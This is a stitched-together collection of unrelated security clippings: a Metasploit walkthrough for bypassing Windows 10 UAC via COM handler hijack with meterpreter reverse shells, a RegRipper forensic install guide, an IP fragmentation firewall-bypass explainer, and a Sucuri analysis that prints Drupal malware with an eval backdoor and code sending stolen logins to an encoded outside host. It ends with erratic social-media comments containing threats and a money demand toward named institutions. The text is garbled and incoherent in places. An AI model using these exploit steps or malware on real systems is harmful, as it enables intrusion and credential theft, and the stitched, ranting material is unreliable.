Bypass UAC in Windows 10 using bypass_comhijack Exploit

In this article we are going to bypass User Access Control (UAC) in targeted system. It is the post exploitation; hence attacker must exploit target system at first then escalate UAC Protection Bypass via COM Handler Hijack.

Let’s start!!

 Attacker: Kali Linux

Target: window 10

Firstly exploit the target to receive meterpreter session of victim’s system. Once you get the meterpreter session 1 then type following command to check system authority and privileges.

getuid

getprivs

 From given image you can perceive that attacker is inside the meterpreter shell of victim’s system but don’t have system/admin authorities and privileges. Hence here we need to bypass UAC Protection of targeted system.

To perform this attack you need to manually add bypass_comhijack exploit inside metasploit framework.

Copy the entire content of “bypass_comhijack” from here and past it in a text document, now save as bypass_comhijack.rb inside the following path:

usr>share>metasploit_framework>modules>exploit>windows>local

 From given image you can observe bypass_comhijack.rb exploit has been saved, as attacker has his meterpreter session therefore now he can use this exploit in order to bypass UAC protection.

This module will bypass Windows UAC by creating COM handler registry entries in the HKCU hive. When certain high integrity processes are loaded, these registry entire are referenced resulting in the process loading user-controlled DLLs. These DLLs contain the payloads that result in elevated sessions. Registry key modifications are cleaned up after payload invocation.

use exploit/windows/local/bypassuac_comhijack

Msf exploit (bypassuac_comhijack) > set payload window/x64/meterpreter/reverse_tcp

Msf exploit (bypassuac_comhijack) > set session 2

Msf exploit (bypassuac_comhijack) > set lhost 192.168.0.20

Msf exploit (bypassuac_comhijack) > exploit

From given image you can observe that meterpreter session 3 opened, now type following command to determine system authority privileges.

getsystem

getprivs

 Wonderful!! Attacker got system/admin authorities and privileges.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

http://www.hackingarticles.in/bypass-uac-windows-10-using-bypass_comhijack-exploit/

How to install RegRipper registry data extraction tool on Linux

Contents

• • 1. Pre-requisites
  • 2. Installation of required libraries
  • 3. RegRipper script installation
  • 4. RegRipper Plugins installation
  • 5. RegRipper command examples

RegRipper is an open source forensic software used as a Windows Registry data extraction command line or GUI tool. It is written in Perl and this article will describe RegRipper command line tool installation on the Linux systems such as Debian, Ubuntu, Fedora, Centos or Redhat. For the most part, the installation process of command line tool RegRipper is OS agnostic except the part where we deal with installation pre-requisites.

https://linuxconfig.org/how-to-install-regripper-registry-data-extraction-tool-on-linux

https://github.com/keydet89/RegRipper2.8

Pre-requisites

Fist we need to install all prerequisites. Choose a relevant command below based on the Linux distribution you are running:

DEBIAN/UBUNTU
# apt-get install cpanminus make unzip wget
FEDORA
# dnf install perl-App-cpanminus.noarch make unzip wget perl-Archive-Extract-gz-gzip.noarch which
CENTOS/REDHAT
# yum install  perl-App-cpanminus.noarch make unzip wget perl-Archive-Extract-gz-gzip.noarch which

Installation of required libraries

The RegRipper command line tool depends on perl Parse::Win32Registry library. The following commands will take care of this pre-requisite and install this library into /usr/local/lib/rip-lib directory:

# mkdir /usr/local/lib/rip-lib
#  cpanm -l /usr/local/lib/rip-lib Parse::Win32Registry

RegRipper script installation

At this stage we are ready to install rip.pl script. The script is intended to run on MS Windows systems and as a result we need to make some small modifications. We will also include a path to the above installed Parse::Win32Registry library. Download RegRipper source code from https://regripper.googlecode.com/files/. Current version is 2.8:

#  wget -q https://regripper.googlecode.com/files/rrv2.8.zip

Extract rip.pl script:

# unzip -q rrv2.8.zip rip.pl 

Remove interpretor line and unwanted DOS new line character ^M:

 
# tail -n +2 rip.pl > rip
# perl -pi -e 'tr[\r][]d' rip

Modify script to include an interpretor relevant to your Linux system and also include library path to Parse::Win32Registry:

# sed -i "1i #!`which perl`" rip
# sed -i '2i use lib qw(/usr/local/lib/rip-lib/lib/perl5/);' rip

Install your RegRipper rip script and make it executable:

# cp rip /usr/local/bin
# chmod +x /usr/local/bin/rip

RegRipper Plugins installation

Lastly, we need to install RegRipper's Plugins.

# wget -q https://regripper.googlecode.com/files/plugins20130429.zip
# mkdir /usr/local/bin/plugins 
# unzip -q plugins20130429.zip -d /usr/local/bin/plugins

RegRipper registry data extraction tool is now installed on your system and available via rip command:

# rip
Rip v.2.8 - CLI RegRipper tool
Rip [-r Reg hive file] [-f plugin file] [-p plugin module] [-l] [-h]
Parse Windows Registry files, using either a single module, or a plugins file.

  -r Reg hive file...Registry hive file to parse
  -g ................Guess the hive file (experimental)
  -f [profile].......use the plugin file (default: plugins\plugins)
  -p plugin module...use only this module
  -l ................list all plugins
  -c ................Output list in CSV format (use with -l)
  -s system name.....Server name (TLN support)
  -u username........User name (TLN support)
  -h.................Help (print this information)
  
Ex: C:\>rip -r c:\case\system -f system
    C:\>rip -r c:\case\ntuser.dat -p userassist
    C:\>rip -l -c

All output goes to STDOUT; use redirection (ie, > or >>) to output to a file.
  
copyright 2013 Quantum Analytics Research, LLC

RegRipper command examples

Few examples using RegRipper and NTUSER.DAT registry hive file. 

List all available plugins:

$ rip -l -c

List software installed by the user:

$ rip -p listsoft -r NTUSER.DAT
Launching listsoft v.20080324
listsoft v.20080324
(NTUSER.DAT) Lists contents of user's Software key

listsoft v.20080324
List the contents of the Software key in the NTUSER.DAT hive
file, in order by LastWrite time.

Mon Dec 14 06:06:41 2015Z       Google
Mon Dec 14 05:54:33 2015Z       Microsoft
Sun Dec 29 16:44:47 2013Z       Bitstream
Sun Dec 29 16:33:11 2013Z       Adobe
Sun Dec 29 12:56:03 2013Z       Corel
Thu Dec 12 07:34:40 2013Z       Clients
Thu Dec 12 07:34:40 2013Z       Mozilla
Thu Dec 12 07:30:08 2013Z       MozillaPlugins
Thu Dec 12 07:22:34 2013Z       AppDataLow
Thu Dec 12 07:22:34 2013Z       Wow6432Node
Thu Dec 12 07:22:32 2013Z       Policies

Extract all available information using all plugins and save it to case1.txt. file:

$ for i in $( rip -l -c | grep NTUSER.DAT | cut -d , -f1 ); do rip -p $i -r NTUSER.DAT &>> case1.txt ; do

  bypass packets on ip fragmentation networks (SCADA) hack.docx by Elsa Cristina David on Scribd

good morning worldwide! welcome back to war! so I stucked yesterday after the BACnet, thinking on air gapped SCADA protection. Today I'm starting with this first issue, DNP 3 stack that uses IP fragmentation

two layers of the OSI model are specially interesting when IP fragmentation is discussed – layer 3 (network) and layer 2 (data link). Data of the network layer is called a datagram and data of the data link layer is called a frame. From the data flow perspective – the datagram becomes included in the frame (encapsulation) and is sent to the receiver via the physical medium in the form of ones and zeros (physical layer – layer 1 of the OSI model).

It may occur that the data of the network layer might be too large to be sent over the data link layer in one piece. Then it needs to be fragmented. How much data can be sent in one frame? It is defined by the MTU (Maximum Transmission Unit) – for example MTU is 1500 bytes for the Ethernet, which is commonly used at the data link layer.

Let’s describe now how IP fragmentation actually works. We need some indication that the fragments belong to the specified datagram (please keep in mind that these fragments need to be reassembled later by the receiver). For this purpose the identification number is used – the same value is used for all fragments that are created as a result of the datagram’s fragmentation. These fragments need to be reassembled to the original datagram, but how should they be reassembled (order of fragments)? Offset is used for this purpose. How does the receiver know the number of fragments? Here the flag MF (More Fragments) is used. When MF flag is set, the system knows that the next fragment is expected. The last fragment is the one without MF flag.

To summarize: the sender chooses the size of datagram that is not greater than the MTU of attached network medium and then the process of IP fragmentation is delegated to the routers, which connect different network media with different MTUs.

There is also another approach to IP fragmentation – Path MTU Discovery. The idea is that the sender sends a probe datagram with DF (Don’t Fragment) flag set. If the router gets this probe datagram and sees that it is larger than the MTU of the attached network medium, then the problem occurs – the router has to fragment it, but the probe datagram is said not to be fragmented. Then the message about this problem is sent to the sender who interprets the answer and knows that the datagram needs to be smaller to avoid fragmentation on the way to the receiver. The sender wants to find out how large the datagram can be to avoid fragmentation by the routers. That’s why this process is called Path MTU Discovery and fragmentation in this approach is delegated to the sender. The problem with this approach is that the probe datagram might have been sent via different route than the next datagrams. As a consequence, it may turn out that the smallest MTU discovered by the sender is actually not the smallest one for the next datagrams, and the fragmentation done by routers will still be needed.

What happens when the fragment is lost? The retransmission occurs when TCP is used at the layer 4 of the OSI model (transport layer).

3. IP Fragmentation Overlapping

Let’s assume that the packet filter allows only the connections to port 80, but the attacker wants to connect to port 23. Although the packet filter is configured to block the connections to port 23, the attacker might try to use IP fragmentation overlapping to bypass the packet filter and finally connect to this port.

This attack works as follows. The packet filter might be implemented in the way that the first fragment is checked according to the implemented rules – when the connection to port 80 is seen, the packet filter accepts this fragment and forwards it to the receiver. Moreover, the packet filter may assume that the next fragments just include the data, and this is not interesting from its point of view. As a consequence, the packet filter forwards the next fragments to the receiver.

Recall at this point that the reassembling occurs when the fragments arrive to the receiver. The next fragment (as it has been said – forwarded by the packer filter) might have been specially prepared by the attacker – the carefully chosen offset has been used to overwrite the value of the destination port from the first fragment. The receiver waits for all fragments, reassembles them, and finally the connection to port of the attacker’s choice is established.

The assumption here is that the packet filter looks at the first fragment that has all the necessary information to make a decision about forwarding or denying the fragment – the other fragments are assumed not to have interesting data (from packet filter’s point of view) and are just forwarded.

How could we solve this problem? If the packet filter reassembled the fragments before making a decision (forward or deny), then the attacker would be stopped. As we can see this approach is about understanding the state or context of the traffic and is called stateful inspection (in contrast to the previously described packet filter that is stateless).

Bypassing Packet Filters with IP Fragmentation Overlapping

1. Introduction The process of IP fragmentation occurs when the data of the network layer is too large to be transmitted over the data link layer in one pi

RESOURCES.INFOSECINSTITUTE.COM

http://resources.infosecinstitute.com/bypassing-packet-filters-with-ip-fragmentation-overlapping/#gref

Get info from any web service or page http://oscarotero.com/embed3/demo

Out-of-Site Drupal Malware

2016-07-13  by  Cesar Anjos

We recently wrote about a Drupal black-hat SEO hack that among other things redirected users coming from Google to botscache[.]com site. It hijacked the bootstrapping process via the session_inc variable in database, then made Drupal load a malicious file from the global /tmp directory instead of the standard includes/session.inc file.

This malware evolves and we have found its new variation. Again, the only malicious code that could be found within the site structure was just a file name. This time it was in the system table and it was the name of the file to load a Drupal module from. However, the file had a .jpg extension and it was loaded from a directory that belonged to a different website under the same server account ../otherwebsite/sites/default/files/slides/Search.jpg.

Taking a look at that Search.jpg file we can see the following code:

if(isset($_POST["gbdc"])){@preg_replace('/^/e','e'.'val($_POST["gbdc"])', 'add');exit;}

function drupal_get_urlsc_callback_url($url) {  
  ...
  return $file_contents;   
}

if(isset($_POST['op'])&&$_POST['op']=='Log in'){
  ...
  if(user_authenticate(@$_POST['name'],@$_POST['pass'])){
 $args_result_url=base64_decode("aHR0cDovLzB4MHguY28vcC5waHA/dT0=").base64_encode(@$_POST['name']);
 $args_result_url.="&p=".base64_encode(@$_POST['pass'])."&url="....;
 drupal_get_urlsc_callback_url($args_result_url);
  }
}

if(empty($_COOKIE) && preg_match('/\.google\.|\.aol\.com|\.ask\.com/i',@$_SERVER["HTTP_REFERER"])) {
   header("location:http://botscache[.]com/n.php?".$_SERVER["HTTP_HOST"]....);
   exit;
}

if(empty($_COOKIE) && $_SERVER["REQUEST_URI"]=='/google4a4791b250e72fd1.html'){
    echo 'google-site-verification: google4a4791b250e72fd1.html';
    exit;
}

The functionality is pretty much the same: backdoor to execute arbitrary code, botscache[.]com redirection of the search engine traffic (Air Jordan replica spam) and malicious Google Search Console verification. However, this variation also add the functionality to steal Drupal credentials. When someone submits a login form, the malicious module verifies that the credentials are valid and sends them to their own site 0x0x[.]co (the domain name is base64-encoded).

This Drupal malware demonstrates that infection is not always limited to the site itself. You may not find anything suspicious if you scan only the site directory. The actual malware may be anywhere on the server: in publicly writable directories like /tmp and /var/tmp, inside neighbor sites that share the same server account, etc. If one of your sites is hacked, don’t limit the cleanup to this site only. You should always scan all the sites you have on the same server - all the sites may be infectedand some of them may have backdoors and malicious files lurking, leading to recurring infections.

This infection also reminds us about the importance of changing passwords after every site hack. It’s always a good idea to restrict access to CMS admin area. Two factor authentication and/or IP whitelist will stop hackers even if they managed to steal your credentials. You can do it on your own server or place your site behind a website firewall and have it block unwanted logins.

http://labs.sucuri.net/?note=2016-07-13

PHP library to get information from any web page (using oembed, opengraph, twitter-cards, scrapping the html, etc). It's compatible with any web service (youtube, vimeo, flickr, instagram, etc) and has adapters to some sites like (archive.org, github, facebook, etc).

Requirements:

• PHP 5.5+
• Curl library installed

• If you need PHP 5.3 support, use the 1.x version
• If you need PHP 5.4 support, use the 2.x version
• https://github.com/oscarotero/Embed

SCADA SHODAN STUXNET

Elsa David

6 min · 

Good morning!!!! Welcome back to War everybody!
awesome-industrial-control-system-security tools

hslatman/awesome-industrial-control-system-security

awesome-industrial-control-system-security - A curated list of resources related to Industrial Control System (ICS) security.

GITHUB.COM

5 comentários

GostoMostrar mais reações

Comentar

Partilhar

Comentários

Elsa David please NSA - National Security Agency...after you...

GostoMostrar mais reações

 · Responder · 6 min

Gerir

Elsa David let me see what stuxnet was about Mossad----so the iranians won't die stupid thinking on infected usb...come on...DEBKAfile they are not thta stupid...let usb inside after chernobyl

GostoMostrar mais reações

 · Responder · 4 min

Gerir

Elsa David so...gentlemen...where was the vulnerabilty ? https://nmap.org/nsedoc/scripts/bacnet-info.html

bacnet-info NSE Script

Discovers and enumerates BACNet Devices collects device information based off standard requests. In…

NMAP.ORG

GostoMostrar mais reações

 · Responder · Eliminar pré-visualização · 2 min

Gerir

Elsa David I'm chsing you you cinic motherfuckers US Intelligence Community...

GostoMostrar mais reações

 · Responder · 1 min · Editado

Gerir

Elsa David you wil pay me The Wall Street Journal 35 million 155 thousand euros...the bad way

GostoMostrar mais reações

 · Responder 

https://github.com/digitalbond/Redpoint#bacnet-discover-enumeratense

https://nmap.org/nsedoc/scripts/bacnet-info.html